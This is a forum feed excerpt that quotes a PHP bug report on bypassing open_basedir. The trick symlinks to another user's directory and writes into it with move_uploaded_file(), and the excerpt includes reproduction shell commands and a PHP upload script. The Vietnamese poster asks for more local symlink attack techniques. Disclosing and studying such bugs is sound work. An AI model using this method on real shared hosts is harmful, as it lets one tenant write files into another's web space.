<![CDATA[Latest posts for the topic "local bypass user via symlink"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net local bypass user via symlink http://bugs.php.net/bug.php?id=40931
Bug #40931 open_basedir bypass via symlink and move_uploaded_file() Description: ------------ User can bypass open_basedir restriction by move_uploaded_file() if target file path is symlink to any directory. Reproduce code: --------------- user1 will upload file to user2's /home/user2/public_html folder. We have in /etc/passwd: user1:32001:32001::/home/user1:/bin/bash user2:32002:32002::/home/user2:/bin/bash Target folder allows to write for anybody: # ls -lA /home/user2 drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/ Apache have mod_php intalled. Apache config for user1: <VirtualHost xxx.xxx.xxx.xxx> ServerName user1.xxxxxxx.com DocumentRoot /home/user1/public_html User user1 php_admin_value open_basedir "/home/user1" </VirtualHost> User user1 can do something like: $ cd /home/user1/public_html/ $ ln -s /home/user2/public_html user2_public_html $ echo '<html><body> <? if ( isset($_FILES["userfile"]) ) { echo "Upload "; if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_h tml/file.ext")) echo "ok"; else echo "failed"; } ?> <form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data"> <input type="file" name="userfile"> <input type="submit"> </body></html>' > upload.php Expected result: ---------------- If we access http://user1.xxxxxxx.com/upload.php after file upload expected message "Upload failed" and no file /home/user2/public_html/file.ext in target folder. Actual result: -------------- If we access http://user1.xxxxxxx.com/upload.php after file upload we got message "Upload ok" and file /home/user2/public_html/file.ext well exist in target folder.  
Các bác vào thảo luân với.hoặc nếu các bác có kinh nghiệm nào local áp dụng symlink thì vui lòng chia sẻ chút ít.]]>
/hvaonline/posts/list/19563.html#116495 /hvaonline/posts/list/19563.html#116495 GMT
Re: local bypass user via symlink /hvaonline/posts/list/19563.html#120734 /hvaonline/posts/list/19563.html#120734 GMT